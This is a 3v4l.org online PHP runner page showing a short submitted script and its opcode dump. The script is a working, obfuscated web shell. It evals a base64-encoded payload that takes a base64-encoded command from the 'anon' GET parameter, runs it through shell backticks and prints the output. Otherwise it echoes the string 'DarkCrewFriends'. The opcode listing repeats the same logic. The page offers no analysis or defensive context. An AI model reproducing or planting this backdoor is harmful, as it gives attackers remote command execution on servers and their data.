3v4l.org

run code in 300+ PHP versions simultaneously
<?php $anon = $_GET['anon']; if (isset($anon)) { eval(base64_decode('JGE9YmFzZTY0X2RlY29kZSgkYW5vbik7JGFhID0gYCRhYDtlY2hvICRhYTs=')); } else {echo base64_decode(RGFya0NyZXdGcmllbmRz);}
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 5, Position 2 = 10
Branch analysis from position: 5
1 jumps found. (Code = 42) Position 1 = 15
Branch analysis from position: 15
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 10
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/W0qEI
function name:  (null)
number of ops:  16
compiled vars:  !0 = $anon
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   FETCH_R                      global              ~1      '_GET'
          1        FETCH_DIM_R                                      ~2      ~1, 'anon'
          2        ASSIGN                                                   !0, ~2
          3        ISSET_ISEMPTY_CV                                         !0
          4      > JMPZ                                                     ~4, ->10
          5    >   INIT_FCALL                                               'base64_decode'
          6        SEND_VAL                                                 'JGE9YmFzZTY0X2RlY29kZSgkYW5vbik7JGFhID0gYCRhYDtlY2hvICRhYTs%3D'
          7        DO_ICALL                                         $5      
          8        INCLUDE_OR_EVAL                                          $5, EVAL
          9      > JMP                                                      ->15
         10    >   INIT_FCALL                                               'base64_decode'
         11        FETCH_CONSTANT                                   ~7      'RGFya0NyZXdGcmllbmRz'
         12        SEND_VAL                                                 ~7
         13        DO_ICALL                                         $8      
         14        ECHO                                                     $8
         15    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
150.08 ms | 1394 KiB | 15 Q